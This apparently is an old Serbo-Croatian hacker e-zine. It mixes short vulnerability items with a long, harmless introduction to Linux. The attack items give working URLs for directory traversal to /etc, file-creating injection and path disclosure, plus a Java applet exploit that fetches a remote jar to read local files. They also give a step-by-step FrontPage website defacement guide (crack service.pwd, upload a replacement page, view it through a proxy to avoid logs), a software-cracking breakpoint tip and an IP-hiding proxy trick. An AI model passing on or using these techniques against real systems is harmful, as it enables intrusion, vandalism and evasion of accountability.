6. Stvaranje backspace.bat fajla na serveru-------------------------------------------------------------------------

Ugrozene su verzije 3.5x i NT 4.0 bez odgovarajuceg Service Packa(ne secam se tachno koji sp je potreban). Posle ukucavanja:

www.server.com/scripts/script_name%0A%0D>PATH\backspace.batstvorice se jedan prazan fajl backspace.bat na tom serveru. Resenje

je instaliranje odgovarajuceg sp-a na taj rachunar sa WinNT.

========================================================

7. Apache HTTP Server - Exploit-------------------------------------------------------

Ako upishemo u nash browser Url koji ce u sebi da sadrzi prekohiljadu '/', onda cemo dovesti Apache Web Server u stanje kad

koristi ogromne CPU resurse. Da bi ovaj DDoS (distributed denial ofservice) uspeo, potrebno je napraviti puno simultanih konekcija.Ranjivi verzije Apache Web Servera su sve verzije pre 1.2.5 a ova

verzija 1.2.5 i novije su imune na ovakvu vrstu napada.Napad jekrajnje jednostavan - dodaj te puno '/' u URL i Apache ce biti spreman

da potroshi ogromne resurse dok ne procesira takav zahtev. Ako jeogroman broj ovakvih zahteva poslat u isto vreme na server, onda bi

isti server mogao biti nedostupan !!!

========================================================

8. PHP Path Revealing Vulnerability-------------------------------------------------------------

Pomocu ovoga Vulnerability-ja, haker moze doci do informacije gde senalazi direktorijum sa PHP podacima. Ovo se deshava na svim

serverima na kojima je ukljucen error_reporting (prijava greshaka).Ranjivi su sistemi PHP 4.01 i noviji. Ovo shljaka tako shto kada u

browser upishemo nepostojecu stranicu npr. www.server.com/he.php3i server ce da prijavi Fatal Error i pokazace gde se direktorijum nalazi.

Npr. evo jednog sluchaja:

Fatal error: Unable to open /vhmap/i/n/server.com/he.php3 in - on line 0

No input File specified

Reshenje ovog problema je iskljucivanje error_reporting-a, ali ovoreshenje moze da izazove i druge nezeljene posledice.

========================================================

9. Sakrivanje IP broja u mIRCu----------------------------------------------------

Ovo uputstvo sam pisao po ugledu na mIRC 5.71 a isto je i za novije istarije verzije. Naime, treba uci u opcije i naci pod stavkom Connectizabrati Firewall. Tu treba chekirati 'Use SOCKS Firewall', za protokol

treba izabrati 'Socks4', u 'Hostname' ukucaj 'interate.com.pe' i u'Port' ukucaj '1080'. Posle ovoga Restartuj mIRC i onda cesh biti

anoniman. Ovo ce ti mozda malo usporiti mIRC zato shto ce se sveobavljati preko kompjutera koji se nalazi u Americi, ali vredi. Ako

hocete mozda neshto brze, potrazite proxy adrese za mIRC i isprobajteih i nadjite sebi najbrzu.

========================================================

10. Trik u SoftICE za crackere koji nisu znali--------------------------------------------------------------------------

Ako radite u SoftICE-u i zelite da crackujete neku protekciju u programu,ja bih vam preporuchio da breakpoint postavite ovako:

bpx hmemcpy

U 90% slucajeva naci cete se u samoj blizini protekcije u kodu, i uzmalo iskustva moci cete da crackujete program. Ovo vazi za sledece

protekcije:- Serial

- Name/Serial- Name/Company/Serial

i sl.

========================================================

***************************************************************************

SADRZAJ:------------------1. Master Index directory traversal vulnerability(translated by BaCkSpAcE)

2. PHPix 1.0.X directory traversal vulnerability(translated by BaCkSpAcE)

3. HTimage.exe vulnerability, part I(translated & modified by BaCkSpAcE)

4. Front Page Bug(written by BlackPhoeniX, modified by BaCkSpAcE)

5. IE 5.5/Outlook java security vulnerability(written by Georgi Guninski, translated by BaCkSpAcE)

6. HyperTerminal Buffer Overflow Vulnerability(written by USSR Security Advisory, translated by BaCkSpAcE)

7. Osnove Linuxa - Prvi deo(downloaded from hr site)

8. ALT 255(written by BaCkSpAcE)

=======================================================

1. Master Index directory traversal vulnerability--------------------------------------------------------------------------------Pronadjena je greshka u Master Indexu koja dozvoljava kretanjekompletnim sistemom zrtve, uz dozvolu chitanja fajlovai foldera.Master Index je profesionalni pretrazivachki engine kao shto jeYahoo i AltaVista. Master Index moze biti pronadjen na adresi:http://www.armadastyle.com/masterindex.html.Master Index dozvoljava napadachu da prosurfuje kroz serverske

fajlove koristeci $catigory=_some_dir_variable. Pomocu ovoga jemoguce prochitati bilo koji fajl ili folder sa privilegijama kao i httpd.Evo vam jedan primer: (Prvi i drugi red su spojeni)http://www.target.com/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc

Proizvodjac Master Indexa je informisan o ovom bugu. On je izjavioda sachekaju sledecu patchovanu verziju Master Indexa koja budeobjavljena.

=======================================================

2. PHPix 1.0.X directory traversal vulnerability------------------------------------------------------------------------------Pomocu ovog buga na Linux/Unix rachunarima sa PHPix 1.0.0 - 1.0.2mozete prochitati bilo koji fajl ili folder na serveru. PHPix jeWeb-based foto album viewer napisan u PHP. PHPix Photo Album seoze downloadovati sa http://phpix.org. Pronadjena je greshka takvada napadach moze da pristupi svim fajlovima koristeci$mode=album&album=_some_dir_variable sa istim privilegijama kaoi httpd. Evo jednog primera: (Oba donja reda su spojena)http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0Reshenje ovog problema je downloadovanje nove patchovane verzijePHPix-a!!!

=======================================================

3. HTimage.exe vulnerability, part I-----------------------------------------------------------Pomocu ovog fajla (/cgi-bin/htimage.exe) koji dolazi uz FrontPagemozemo da vidimo ceo put do root direktorijuma. Evo jednog primerawww.server.com/cgi-bin/htimage.exe?0,0Ja sam probao PTT i pokaze da se root nalazi na E:\VirtualWWW\pttza sajt PTTa. O ovome cemo nastaviti da pishemo u sledecemtutorialu. Reshenje je brisanje htimage.exe fajla ili prelazak na *nix,zato shto Windows serveri dozvoljavaju izvrshavanje exe fajla naserveru dok kod *nixa to ne moze. Ovo reshenje ce vaziti i za part2i part3 o HTimage.exe vulnerability.

=======================================================

4. Front Page Bug-------------------------------FrontPage bug je rupa koju nemarljivi administratori cesto ostave na

svojim serverima. Ako trazimo takve stranice na altavisti cemo ihnaci priblizno 10.000. Napisani su hiljade tekstova sa tematikom FPbuga ali kako vidimo jos uvijek ima administratora koji su lenji dapogledaju ima li njihova stranica ovaj problem.Ovaj nacin je jedanod najjednostavnijih kojima se mozete posluziti kada zelite defacovatistranicu. Takodjer, ovaj nacin je dosta omiljen medju mladjom (citaj:neiskusnijom) hakerskom populacijom jer je vrlo lak za razumjeti iskoro svako ga moze nauciti, pa ga vecina iskusnijih hakera smtralame-om, ali kao sto sam vec rekao, za hakere pocetnike ce biti dostadobar jer je lak. I onda kada defaceate stranicu ipak ste d00d, nemorate nikom reci kako ste je defaceali ;) Jedini uvjet je da imate Winmasinu i da imate FrontPage, a imate ga skoro 100 % jer dolazistandardno sa Internet Explorerom. Sve sto trebate uraditi je sledece:U nekom browseru upisite link:service.pwd ili _vti_pvt. Dobicete listustranica sa fp bugom. Kliknite na neki od linkova i dobicete index od_vti_pvt foldera. U stvari _vti_pvt folder i jeste ahilova peta fp bugstranica, tacnije file koji se zove service.pwd. U tom file-u cete nacienkriptovan password. Sada ga samo trebate cracknuti. Tu ce vamnajbolje posluziti neki uobicajeni password crack alat poput JohnThe Rippera ili Cracker Jack-a. Nakon sto ste cracknuli passwordsve je fakticki vec uradjeno. Sada otvorite FrontPage i napisite nestokao "J4 s4m n4j74j3b4n1j1 h4k3r n4 5v1j37u" ili nesto slicno tome izamemorisite to kao index.html. Sada imate vise izbora kakopostaviti vas index.html na stranicu - zrtvu. Prvi je da pokusatedirektno iz FrontPage-a sa opcijem File --> Save As i onda upisetestranicu zrtvu. Kada vam zatrazi password upisitie vas cracknutipass. Hint: Ponekad vas nece ni pitati za password pa pokusajte i tou krajnjem slucaju. Drugi nacin je da to uradite preko nekog FTPklijenta. naci imate index.html i pomocu FTP klijenta upoloadatenjega na vasu zrtvu. Naravno kad zatrazi user i password upisitevas user i cracknuti password. Ovo rijesenje radi u 99 % slucajeva.Ono 1 % se desi ako je admin kojim slucajem promijenio pass, a akoje tako moracete ga ponovo cracknuti, ili recimo da ste nestonapravili pogresno i sada imate pogresan pass. I u tom slucaju gacracknite ispocetka. Ima jos jedan nacin da uploadate vas index.htmlna zrtvu. Otvorite Windows Explorer i idite na apu zvanu "WebFolders". Tamo kliknite dva puta na "add webfolder" i upisite urlvase zrtve. Ako upita za pass i user upisite ih a ako ne pita jos bolje(ovo se desava u 0,01% slucajeva). Sada imate vise opcija na izboru.index.html (zrtvina defaultna stranica)index.asp (neki file)default.html (neka stranica)default.asp (neki file)Jednostavni ih sve zamjenite sa vasim index.htmlSada trebate pogledati vasu defaced stranicu. Budite sigurni dakoristite proxy, a ako ne onda recite nekom prijatelju da odepogledati, da vi nebi ostavljali svoj log na toj stranici, jer ce vas utom slucaju lakse uhvatiti. Ako koristite ovu opciju sa Web Foldersnekada cete dobiti poruku: File is already only, open? Otvorite je iobradite. Nemojte na ovaj nacin pokusavati otvoriti stranice sa nekihfreeservera, nece vam raditi. Eh da jos nesto: Ako dobijete npr.www.server.com/osoba nemojte pokusavati haknuti ovo /osoba ako

nemozet haknuti www.server.com.Ima jedna stvar koja bi vam moglazagorcati zivot. Naime ne kod svih passworda dobivenih preko FPbuga ne mozete uploadovati preko ftp-a stranicu jer passovi za ftpi fp nisu isti. Ali to je dosta rijetko medjutim moze se desiti. Ako vamse desi pokusajte ostale metode ili trazite iducu zrtvu.

=======================================================

5. IE 5.5/Outlook java security vulnerability------------------------------------------------------------------------Georgi Guninski je, kao shto vecina vas zna, jedan od najpoznatijihpronalazacha rupa u IE/Outlook.Evo sada jednog problema koji dajeveliki rizik po onog ko koristi Microsoft Products. Ova rupa dozvoljavada ti server vrshi citanje fajlova i chitanje direktorijumske struktureposle pregleda web-stranice ili chitanja HTML poruke. Problem sejavlja kada se specifira codebase za aplet koji se uchitava iz<OBJECT> taga i jar fajla.Evo pogledajte sledeci kod:

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590><PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar"><PARAM NAME="CODEBASE" VALUE="file:///c:/"><PARAM NAME="URL" VALUE="file:///c:/test.txt"></OBJECT>

Ovaj kod setuje apletov codebase na file:///c:/Ovo nije problem Java jezika i to nije problem u microsoftovom VM,vec je problem u codebase-u koji je setovan od strane IE. Izgleda dapomocu ove rupe mogu da se vrshi upis i izvrshavanje fajlova. Evosledeceg koda koji ce vam pomoci:

---------javacodebase1.html-------------------------------------------<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590><PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar"><PARAM NAME="CODEBASE" VALUE="file:///c:/"><PARAM NAME="URL" VALUE="file:///c:/test.txt"></OBJECT>----------------------------------------------------------------------

--------gjavacodebase.java--------------------------------------------......try{u = new URL(getParameter("URL"));InputStream is=u.openStream();byte ba[]=new byte[1000];int l=is.read(ba);InputStream os=u.openConnection().getInputStream();String s1=new String(ba,0,l);

print(u.toString());print(s1);}.......----------------------------------------------------------------------

Microsoftu je javljeno za ovaj problem 14.10.2000 i rekli su da joshuvek rade na tom patchu. Ako ste zainteresovani idite na sajtmicrosofta pa se informishite!

=======================================================

6. HyperTerminal Buffer Overflow Vulnerability------------------------------------------------------------------------------Sistemi koji podrzavaju ovaj problem su Windows 2000, WindowsME, Windows 98 i Windows 98SE. Ova rupa dozvoljava da seuradi buffer overflow u HyperTerminal Telnet Clientu i moze dadozvoli napadacu da izvrshi neki kod na drugom sistemu. Akokorisnik otvori HTML poruku koja ima ovaj HTML kod, onda ceisti korisnik da nastrada. Evo vam primera:telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/

Patchovi:Windows 98 i 98SEhttp://download.microsoft.com/download/win98/Update/12395/W98/EN-US/274548USA8.EXE

Windows MEhttp://download.microsoft.com/download/winme/Update/12395/WinMe/EN-US/274548USAM.EXE

Windows 2000 (problem se otklanja instaliranjem Service Packa br.1)http://www.microsoft.com/downloads/release.asp?releaseid=25112

=======================================================

7. Osnove Linuxa - Prvi deo------------------------------------------------Linux? Sta je to? Treba li to ikome? Cemu sluzi? Valja li to? Radi li to podWindowsima? I jos hiljade pitanja o Linuxu. Sta je, zaista Linux? Treba livam? Mozete li ziveti bez njega? Zasto uopse citate ovaj umetak? Hoceteli nesto nauciti ili cete samo izgubiti vrijeme?Vec nekoliko godina koplja se lome oko Linuxa. Suprotstavljene su dve

struje - jedna je velika grupa vernih korisnika Microsoftovih proizvodakoja Linux smatra promasajem, a druga je mala grupa zadovoljnih korisnikaLinuxa. Najcesce stvari koje se Linuxu zameraju je "nekompatibilnost sWindowsima" i nedostatak programske podrske. Obe su tvrdnje netacne. Prvaje, zapravo, poluistinita - Windowsi ne mogu vrtiti niti jedan programpisan pod Linuxom, ali Linux moze vrtiti neke programe pisane podWindowsima. Druga tvrdnja je tvrdnja o nedostatku programske podrske. Iakoje dostupno na stotine megabajta programa koje je Linux ili nasledio ilisu to potpuno novi programi, nepostojanje MS Office paketa za Linux običnonepoznavatelje i kvazistrucnjake asocira na siromastvo.No, ostavimo igranje advokata za neku drugu priliku, u ovom umetku imatćete prilike upoznati Linux iznutra, ąto on stvarno jest i o čemu se uopćeradi. Prije nego nastavite, svakako učinite uslugu sebi (ne meni, nitisusjedu, niti prijateljici) - ako nikad prije niste imali prilikuinstalirati Linux OBAVEZNO prvo pročitajte umetak do kraja da biste dobilidojam o čemu se priča i o kakvoj se instalaciji uopće radi. Tek ondamoľete kroz upute za instalaciju ići korak po korak.Ne zaboravite da je cijela priča o Linuxu daleko, daleko obimnija nego jumoľe ispričati ovaj umetak - zato će biti obrađene samo zbiljanajosnovnije stvari, no kad već naučite ovo osnovno, ostalo će ići lakąe.Zato se od čitatelja očekuje i poznavanje rada računala i baremoperativnog sustava DOS jer će mnoge stvari biti objaąnjene usporedbom sDOSom.Linux je operativni sustav. Operativni sustav (kraće: OS) je najniľasoftverska stepenica u vaąem računalu. OS je ono pod čim vaąi programirade i ono ąto se brine o svim potrebama programa. Najpoznatiji operativnisustavi na PC platformi su MS DOS, Windows95 i Windows NT. Windowsi 3.1nisu operativni sustav već je to samo grafičko okruľje koje radi podoperativnim sustavom MS DOS. Windows95 je pomalo hibridan OS koji nudi igrafičko okruľje i komandnu liniju kao ranije verzije MS DOSa, dok jeWindows NT pravi operativni sustav.Linux je po svojim svojstvima najsličniji Windows NT operativnom sustavu -kao i NT, Linux ne vuče za sobom nikakvo staro naslijeđe (poput DOS-a), ikao i NT, Linux je u potpunosti 32-bitni OS (za razliku od DOS-a iWindowsa 95 koji imaju i 16-bitnog naslijeđa). No, za razliku odMicrosoftovih produkata koji svi imaju neke zajedničke spone i zajedničkivizualni identitet, Linux je jedan od operativnih sustava izraslih okodosta stare UNIX arhitekture.Jedna od karakteristika tih operativnih sustava na koje obično nisu

navikli oni koji rade pod Microsoftovim operativnim sustavima je striktnorazlikovanje velikih i malih slova. Imate li dvije datoteke na disku,jedna se zove "Pismo", a druga "pismo" - te dvije datoteke će bitiprihvaćene kao različite, jer se razlikuju u početnom slovu. Jedno jeveliko a drugo malo. Tako i naredbe - sve se naredbe piąu malim slovima.Dogodi li vam se da slučajno napiąete naredbu velikim slovima Linux jeneće prepoznati. Moľda će vas u početku dovoditi u nedoumicu ako nekomprogramu moľete dati argumente "-r" i "-R" koji su u biti isto slovo(zanemarimo li ąto je jedno veliko a drugo malo) a rade različite stvari.No malo samodiscipline će vas naučiti da piąete naredbe malim slovima i datako komunicirate s računalom UMJESTO DA VIČETE NA NJEGA VELIKIM SLOVIMA.Iako je Linux vrlo liberalan glede znakova koje smijete upotrebljavati zanazive datoteka, izbjegavajte upotrebu naąih slova.Je li Linux onda samo jedan od UNIX-a? Linux ipak nije Unix. Da bi jedanOS imao pravo nazivati se Unixom mora zadovoljiti određene uvjete, a Linuxzasad zadovoljava samo par njih, no i to je dovoljno da ga se smatračlanom Unix zajednice.Idejni tvorac Linuxa je Linus Torvalds (torvalds@linux.cs.Helsinki.FI)koji je prije nekoliko godina započeo projekt potpuno besplatnogoperativnog sustava. Zahvaljujući Internetu i ogromnoj količinientuzijazma sa svih strana svijeta, Linux je postao ono ąto je danas i ątoće u budućnosti biti.Linux je, dakle, samostalan, besplatan OS. To prije svega znači da zakoriątenje Linuxa nikom ne trebate platiti, to je potpuno besplatan OS.Zatim, samom činjenicom da je riječ o operativnom sustavu a ne "običnom"programu, Linux nije moguće pogoniti iz DOS-a ili Windows-a, jer je Linuxu stvari zamjena za DOS i Windows-e. Oni mogu koegzistirati na disku, aline mogu u isto vrijeme imati vlast nad računalom. Tj, na računalu moľeteraditi ili pod Windowsima ili pod Linuxom, nikad istovremeno. Istinapostoje za Linux emulatori koji omogućuju startanje DOS ili Windowsprograma, ali se oni i dalje izvrąavaju pod Linuxom kao OS-om.Linux moľe biti smjeąten na istom disku na kojem je već instaliran DOS iliWindows, ali moľe biti i u zasebnoj particiji. Svaki od ta dva načinainstaliranja ima svoje prednosti i mane. U prvom slučaju, kad Linuxinstalirate na već formatizirani disk s FAT tablicom nećete morati fdiskommijenjati disk, praviti nove particije i slično. No, neće se svedistribucije dati instalirati na FAT particiju. U drugom slučaju, kadLinux instalirate na njegovu vlastitu particiju, podaci s te particijedostupni su samo Linuxom, ne i DOS-om (osim uz pomoć posebnih programa).No dobit je viąestruka: na svojoj osobnoj particiji Linux se ponaąa

udobnije, sigurnije i viąestruko je brľi nego na FAT particiji.Uglavnom, jednom instaliran Linux moći ćete podići ili prilikom paljenjaračunala, kad će vas poseban program koji Linux instalira pitati ľelite lipodići Linux ili neki drugi OS (DOS, Windows). Ako iz nekog razloga neinstalirate taj program, moći ćete iz DOS-a (i Win95, ne i iz Win NT)malim programčićem ugasiti OS na kojem trenutno radite i podići Linux.Jednom podignut Linux javit će se pozdravnom porukom i promptom "Login:".Obicno u tekstualnom modu, ali ľelite li tako, Linux odmah po podizanjumoľe prijeći u svoje grafičko okruľje (XWindows, skraćeno X). Ovaj OSmoľete po vlastitoj ľelji koristiti u tekstualnom i u grafičkom modu, pričemu se osnovna funkcionalnost operativnog sustava ne razlikuje previąeovisno o tome radite li u grafičkom ili tekstualnom načinu rada.Spomenuo sam "Login:" prompt s kojim se vjerojatno dobar dio čitatelja većsusreo. Kako je Linux viąekorisnički OS, pri svakom započinjanju poslapotrebno se predstaviti računalu, reći "ja sam taj i taj", da bi računaloznalo s kojim korisnikom ima posla i da bi mu učinilo dostupnim njegovepodatke, a nedostupnim tuđe podatke.Ne, ne morate biti shizofrenik da biste koristili multikorisničkemogućnosti Linuxa. Linux jednako radi i s samo jednim korisnikom na strojukao i kad ih ima desetak i svi istovremeno rade. To mu omogućuje ugrađenimultitasking.Viąekorisnički stroj je svaki stroj koji dozvoljava rad viąe korisnika naistom stroju. Za razliku od MS DOS-a i starih Windows-a koji supretpostavljali da je vlasnik računala istovremeno i jedini korisnik,Windows NT, Linux i mnogi drugi OS-ovi pretpostavljaju da vlasnik računalanije jedini korisnik stroja, već da stroj mogu koristiti i druge osobe.Pri tome nije bitno da li oni računalu pristupaju istovremeno ili jedan pojedan. Isto tako, nije vaľno pristupaju li računalu s udaljenog terminalaili direktno na računalu (u tom slučaju govorimo o "konzoli").Jedna od karakteristika viąekorisničkog stroja je zaątita podataka.Zamislimo primjerice da ste na vaąe računalo instalirali Linux. I vi unjemu radite, ali upada vam u sobu brat/sestra/muľ/ľena i kaľe da mu/jojtreba računalo za obaviti neke poslove. Pristanete li, vaą jednokorisničkiLinux tad počinje pokazivati svoje viąekorisničke prednosti: dajte Linuxudo znanja da će joą jedna osoba koristiti računalo (stručno bi se to reklonapravite novi account na računalu), a Linux će sam brinuti o tome da taosoba ima sve potrebno za rad, ali će pri tome paziti i da ta osoba,primjerice, ne moľe pristupati vaąim podacima već samo onima koje jojdozvolite. Isto tako, podaci te osobe bit će zaątićeni od vaąeg pogleda(ili pogleda neke treće osobe). Uzajamno si isto tako nećete moćimijenjati ili brisati podatke. Dodatno, ta druga osoba uopće ne morasjediti za vaąim računalom - ona se moľe modemom, mreľnom karticom ili naneki treći način povezati s vaąim računalom i s nekog drugog mjesta (druge

sobe, druge zgrade ili drugog kraja svijeta) raditi kao da sjedi u vaąojsobi za vaąim računalom.Ideja viąekorisničkog stroja je, dakle, napraviti takvu okolinu u kojoj ćesvatko, bez obzira gdje se nalazi i da li za vaąim računalom netko većradi, moći pristupiti računalu i raditi kao da sjedi za njim. Pri tome ćeimati jedan dio diskovnog prostora samo za sebe, koji će biti zaątićen odnepoľeljnih, ali će moći bez ikakvih ograničenja dijeliti ľeljene datotekes drugim osobama.Multitasking je sposobnost operativnog sustava (ne računala nego baąoperativnog sustava) da izvrąava viąe programa odjednom. Iako ulazećidublje u analizu multitaskinga neizbjeľno dodirujemo područjemultiprocesorskih računala, za ugodan multitasking dovoljno nam je iračunalo s jednim procesorom.Multitasking, dakle, ne ovisi o računalu niti o procesoru, već ooperativnom sustavu koji koristite. Tako primjerice Amiga i Macintoshračunala imaju OS od samog početka rađen s idejom multitaskinga, dok PCračunala imaju vrlo ąarenu ponudu operativnih sustava s nekolikorazličitih mogućnosti multitaskinga.Počevąi joą od starog MS DOS-a, koji nikad nije bio zamiąljen kao OS smogućnostima multitaskinga, preko Windows 3.x serije koja je "dodavala"DOS-u mogućnost izvrąavanja viąe programa istovremeno (ili nekih programanezavisnih proizvođača, poput DesqView-a), sve do Win95 i WinNT koji uračunalo uvode kvalitetne multitasking mogućnosti. U igri je čak iCalderin OpenDOS, kopija MS DOS-a koja ima ugrađen multitasking.Za razliku od OpenDOS-a i Windowsa, Linux od samog svog nastanka radi kaomultitasking OS koji za sobom ne vuče potrebu za kompatibilnoąću sstarijim verzijama.Moć multitaskinga najbolje ćete osjetiti radite li imalo zahtjevnijeposlove za računalom. Trebate li računalo samo da biste na njemuizvrąavali jedan program (Word, bazu podataka, program za crtanje..) ondavam multitasking i nije pretjerano koristan (iako je zgodno odigratiSolitaire dok baza traga za podacima). No, trebate li istovremenopokrenuti nekoliko programa, multitasking je jedino rjeąenje. Primjerice,osoba iz prethodnog poglavlja baą mora taj čas napisati neki dokument dokvi radite ozbiljne stvari na računalu (Doom i slično). Veľe li se prekoterminala moći će bez problema uraditi svoj posao dok se vi zabavljate.Pri tome nećete zasmetati jedno drugome, niti ćete imati potreberazmiąljati da li joą tko osim vas radi na računalu - Linux sam brine oopsluľivanju oba korisnika.Linux je dosta skroman po izboru hardwarea na kojem ľeli raditi. Zavrtjetiga moľete i na 386SX računalu s 4MB memorije i Hercules video karticom.Iako je to takoreći zastario procesor, na njemu Linux radi jednako kao ina 486 ili Pentium procesoru - razlika je jedino u brzini izvrąavanja

programa.Nekakav logičan minimum bilo bi 486 računalo s 8MB memorije, na kojem seLinux dosta ľivlje ponaąa, i to je najmanja konfiguracija u kojoj moľeterelativno ugodno raditi u XWindows sučelju (Linuxovo grafičko sučelje,zapravo uobičajeno grafičko sučelje Unixa). Već s 16MB memorije Linux seosjeća komotno, a s jačim procesorom i viąe memorije moľete samoprofitirati. Linux ne pati toliko na procesor koliko na memoriju, pa ćetedodavanjem viąe memorije bolje profitirati nego stavljanjem novogprocesora. Osobito imate li manje od 8MB memorije u računalu.Diskovni prostor je gotovo jednako ątedljiv. Neke od Linux distribucija sugotovo u cijelosti rađene tako da se mogu pokretati s CD-a, pa je sve ątotrebate učiniti - staviti CD u čitač i pokrenuti Linux, koji će za svojenajminimalnije potrebe (ne viąe od nekoliko megabajta prostora ako netrebate swap datoteku) koristiti DOS particiju, a najveći dio Linuxa bitće učitavan s CD-a.najmanja "normalna" instalacija Linuxa na disk bila bi oko dvadesetak MB.Unutar tih 20-tak MB moľete smjestiti sve najosnovnije stvari, uključujućitu i C prevodilac. Moľete instalirati i neku iz serije "MiniLinux"distribucija, koje zauzimaju čak i manje prostora.Dakako da s tako "osakaćenim" Linuxom nećete imati sve prednosti koje vampruľa kompletnija distribucija, koja bi zauzela od 50 do 500MB prostora nadisku, ovisno o ľeljama i potrebama. Nekakva srednja vrijednost bila bi100-150MB prostora za ugodan rad s paľljivo biranim alatima.Grafička kartica moľe biti bilo koja VGA kartica, čak i CGA, EGA iliHercules. Imate li negdje u praąnjavom podrumu Hercules karticu i monitormoľete i nju staviti u računalo, a Linux će ju moći iskoristiti.Pristup vaąeg Linux računala svijetu ostvarivat ćete obično jedan od ovadva načina: Ethernet karticom ili modemom. Zato je neophodno imati jednood to dvoje. S Ethernet karticama nema problema, podrľano je sve na ąto unormalnim uvjetima moľete naići. Modem isto tako moľe biti bilo koji,vanjski ili ugradivi. Ali ako moľete izbjegavajte P&P podrąku - isključiteju na svakoj kartici koju moľete isključiti, uątedjet ćete si dostavremena oko konfiguriranja računala i traľenja greąaka.Poľeljno je, uglavnom zbog problema pri instalaciji, imati ATAPI CD-ROM.Razlika između ATAPI i ostalih pogona je ąto se ATAPI pogoni veľu na HDDkontroler, kao disk. Ostali se obično veľu na neku karticu u računalu.Nemate li ATAPI CD-ROM, nemojte očajavati, Linux će vjerojatno prepoznatii vaą. Ako ga ne prepozna, morat ćete mu ručno objaąnjavati koji pogonimate u računalu.

Zvučne kartice znaju praviti probleme s Linuxom. U principu je to samopitanje rasprostranjenosti zvučne kartice. Za Linux ćete vrlo rijetko naćiupravljačke programe (drivere, u slučaju Linuxa module) za zvučnu karticukoje je radio proizvođač te kartice; u najvećem broju slučajeva podrąkurade sami korisnici kartice. To nipoąto ne znači da su takvi programimanje kvalitetni ili manje pouzdani - često su manji, bolji i brľi od onihkoje za istu tu karticu ali drugi OS isporučuje proizvođač. Ako je vaąazvučna kartica rijetka, vjerojatno nećete lako naći podrąku za nju, aliako je imalo poznatija - podrąku ćete sigurno imati. "Kompatibilne"kartice često zbog svoje nesavrąene kompatibilnosti imaju problema spodrąkom za karticu koju emuliraju, ali i za njih postoje neka generičkarjeąenja. U biti, dosta mali broj zvučnih kartica nabavljivih u trgovinamanema podrąku u Linuxu.Za razliku od DOSa ili Windowsa, Linux nije ograničen na jednu jedinudistribuciju. Sjetimo se, Linux je besplatan operativni sustav koji moľetecjelokupnog dobiti u source-u. No, distribucije se (i) plaćaju. Zaąto jetako? Postoji viąe različitih distribucija, koje svaka u osnovi imajubesplatan Linux, a neke osim njega imaju i posebno pisane programe.Kupujući distribuciju, ne plaćate Linux, već plaćate trud autoradistribucije da skupe programe i sloľe ih na CD, a u nekim slučajevimaplaćate i posebne programe koji dolaze uz distribuciju a koji nisubesplatni. Bitne razlike u distribucijama nema, niti su one međusobno"nekompatibilne". Riječ je o jednom te istom Linuxu koji je isporučen sviąe ili manje dodatnih programa, ili s nekim posebnim dodacima, ovisno odistribuciji. Dakle, ne moľete pogrijeąiti odlučite li se za ovu ili onudistribuciju, uvijek ćete na kraju dobiti isti rezultat - Linux.Za koju se distribuciju odlučiti? ®elite li besplatnu distribuciju, moľeteju skinuti s Interneta (ili instalirati Slackware s PC Chipovog CD-a), akomercijalne trebate naručiti.Tri najpoznatije i najomiljenije distribucije su Slackware, RedHat iDebian. Sve tri nabavljive su preko Interneta i ne trebate plaćati zanjih. Dok je Slackware neka vrst legende i mjerila za druge distribucije,RedHat i Debian su omiljene zbog mnogih korisnih sitnica, primjerice vrlolaganog biranja koje aplikacije ľelite instalirati i koje maknuti, temogućnosti gotovo automatskog upgrade-a preko Interneta.Komercijalne distribucije nude najrazličitiji izbor, često na viąe odjednog CD-a. Svaka od njih ima svojih prednosti - morate li baą kupitikomercijalnu distribuciju, birajte onu koja najbolje zadovoljava vaąepotrebe. Ako ste početnik, nemojte odmah skakati na komercijalnudistribuciju - instalirajte za početak neku besplatnu, iľivljavajte se nanjoj dok ne naučite malo viąe o Linuxu i kad barem malo uđete u bit togOS-a bit će vam puno lakąe odabrati komercijalnu distribuciju.Sve konfiguracije moguće je instalirati s CDa, a instaliranje s disketepodrľavaju Debian, Linuxware, RedHat, Slackware i WGS Linux Pro; FTP-om jemoguće nabaviti Craftworks, Linuxware, RedHat, Slackware i WGS; s lokalnogdiska (nekog poddirektorija na disku) moguće je instalirati svedistribucije osim Linuxware i Yggdrasil; trebate li Linux na traci ili

Syquest disku morat ćete se zadovoljiti Craftworks distribucijom.Programi za administriranje sustava mogu biti ili tekstualni (OpenLinux,Craftworks, Linuxware, S.u.S.E., Slackware) ili grafički (OpenLinux,Debian, RedHat, WGS..). Razlike u funkcionalnosti nema, ali su grafičkiprogrami pregledniji i intuitivniji.Volite li imati i tehničku podrąku, imat ćete ju kupite li OpenLinux,Craftworks, Linuxware, S.u.S.E., WGS, YGGDRASIL ili komercijalnu RedHatdistribuciju. U ostalim slučajevima "osuđeni" ste na često efikasniju ikvalitetniju podrąku - UseNet grupe comp.linux.* - gdje moľete postaviti8pitanje i uglavnom ćete brzo dočekati odgovor (ili flame). Ne govorite liengleski, pitanja moľete postaviti i u domaće grupe - hr.comp.linux ilihr.comp.unix.

=======================================================

